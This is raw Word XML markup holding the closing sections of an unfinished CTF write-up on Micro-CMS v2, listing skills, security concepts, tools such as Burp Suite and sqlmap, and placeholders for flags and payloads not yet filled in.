      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Understanding HTTP requests/responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">XSS testing techniques</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1023"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Database enumeration with sqlmap</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="69"/>
    <w:bookmarkStart w:id="70" w:name="security-concepts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Broken authentication</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Insecure direct object references</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Improper input validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sensitive data exposure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Client-side injection vulnerabilities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tools-used-throughout"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tools Used Throughout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Burp Suite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Request interception and manipulation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sqlmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQL injection exploitation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Firefox</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web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Kali Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Penetration testing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DevTools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Source inspection and debugging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notes-for-further-completion"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Notes for Further Completion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To finalize this documentation properly, add:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exact flags retrieved</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific endpoints exploited</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Screenshots of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Burp requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">sqlmap output</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1026"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Successful payload execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exact payloads used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication bypass techniques used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any hidden directories discovered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Any session/cookie manipulations performed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1025"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exact vulnerabilities confirmed in Micro-CMS v2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once those details are added, this can become a complete professional pentesting-style CTF report suitable for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Portfolio use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Internship applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cybersecurity learning documentation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1027"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">GitHub write-ups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2026-05-20T18:02:55Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T18:02:55Z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